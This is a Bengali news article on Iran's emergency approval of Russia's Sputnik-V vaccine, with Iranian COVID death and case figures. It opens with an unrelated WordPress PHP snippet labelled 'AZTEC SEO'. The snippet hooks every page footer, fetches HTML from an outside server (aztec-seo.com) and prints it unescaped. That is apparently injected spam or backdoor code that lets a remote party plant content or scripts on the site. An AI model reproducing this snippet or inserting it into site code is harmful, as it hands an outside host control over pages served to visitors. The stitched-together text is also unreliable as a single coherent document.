/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
রাশিয়ার উদ্ভাবিত করোনার টিকা জরুরি ব্যবহারের অনুমোদন দিয়েছে ইরান। আজ (বৃহস্পতিবার) ইরানের স্বাস্থ্য মন্ত্রণালয়ের তথ্য ও গণসংযোগ কর্মকর্তা কিয়ানুশ জাহানপুর বলেছেন, দেশটির খাদ্য ও ওষুধ সংস্থার নিয়ন্ত্রণ বিষয়ক কমিশন রাশিয়ার ‘স্পুতনিক-ভি’ টিকা জরুরি ব্যবহারের অনুমোদন দিয়েছে।
রাশিয়ার পাশাপাশি চীন, ভারতসহ অন্যান্য দেশ থেকেও টিকা আনার সম্ভাবনা পর্যালোচনা করে দেখা হচ্ছে বলে জানিয়েছে স্বাস্থ্য মন্ত্রণালয়। এ পর্যন্ত আরও বেশ কয়েকটি দেশ ‘স্পুতনিক-ভি’ টিকা জরুরি ব্যবহারের অনুমোদন দিয়েছে।
গত আগস্টে রাশিয়া ‘স্পুতনিক-ভি’ টিকার অনুমোদন দেয়। এটি বিশ্বে রাষ্ট্রীয় অনুমোদন পাওয়া প্রথম করোনার টিকা। রাশিয়া জানিয়েছে, তাদের উদ্ভাবিত ‘স্পুতনিক-ভি’ টিকা কার্যকর ও নিরাপদ।
আস্থা না থাকায় মার্কিন যুক্তরাষ্ট্র ও ব্রিটেন থেকে টিকা আমদানি নিষিদ্ধ করেছে ইরান।
এদিকে, ইরানে আজও ২৪ ঘণ্টায় করোনায় আক্রান্ত ৮৫ জন মারা গেছেন। নতুন করে শনাক্ত হয়েছেন ছয় হাজার ৫২৭ জন। এ নিয়ে ইরানে এই ভাইরাসে মৃত্যুবরণ করল ৫৭ হাজার ৭৩৬ জন।
ইরান নিজেও করোনার টিকা তৈরির প্রক্রিয়া এগিয়ে নিচ্ছে। মানবদেহে পরীক্ষামূলক ভাবে ইরানি টিকার ফলাফলকে আশাব্যঞ্জক বলে মনে করছেন বিশেষজ্ঞরা। সূত্র : পার্সটুডে